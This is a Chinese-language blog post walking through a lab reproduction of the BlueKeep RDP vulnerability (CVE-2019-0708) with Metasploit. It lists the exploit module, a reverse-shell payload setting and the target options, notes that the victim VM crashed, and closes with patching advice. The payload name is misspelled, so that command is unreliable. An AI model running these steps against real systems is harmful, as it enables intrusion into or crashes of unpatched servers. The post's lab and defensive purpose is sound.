zoukankan      html  css  js  c++  java
  • cve-2019-0708 远程桌面代码执行漏洞复现

    0X00.漏洞简介:

    Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。

    0X01.环境搭建:

    攻击机:虚拟机kali-2019(已经收纳cve-2019-0708漏洞利用模块)

    受害机:虚拟机windws server 2008 R2

    windows 2008开启3389端口。

     windows 2008关闭防火墙(控制面板——系统和安全——windows防火墙——打开或关闭windows防火墙)。

     这样我们整个环境部署完成。

    0X02.漏洞复现:

    使用kali打开metasploit。

    msfconsole

    搜索cve-2019-0708。

    search cve-2019-0708

     使用攻击模块。

    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

     写入payload。

    set payload windows/x64/meterpeter/recverse_tcp

     查看配置。

    show options

     写入目标ip、本机ip。

    set RHOSTS
    set LHOST

     写入主机。

    set target 3

    这里我们使用的是vmware所以选择3就行,

     开始攻击

    run/exploit

     

     发现我们windows 2008立马蓝屏。

     0X03.影响版本:

    windows2003

    windows2008

    windows2008 R2

    windows xp

    0X04.安全建议:

    下载官方补丁。

  • 相关阅读:
    Kotlin入门(20)几种常见的对话框
    Kotlin入门(19)Android的基础布局
    Kotlin入门(18)利用单例对象获取时间
    Kotlin入门(17)等式判断的情况
    Kotlin入门(16)容器的遍历方式
    Kotlin入门(15)独门秘笈之特殊类
    Android Studio Gradle被墙bug总结
    unity常用的坐标系转换
    欧拉角与万向节死锁
    Unity导出Gradle工程给Android Studio使用
  • 原文地址:https://www.cnblogs.com/cowherd/p/13095900.html
Copyright © 2011-2022 走看看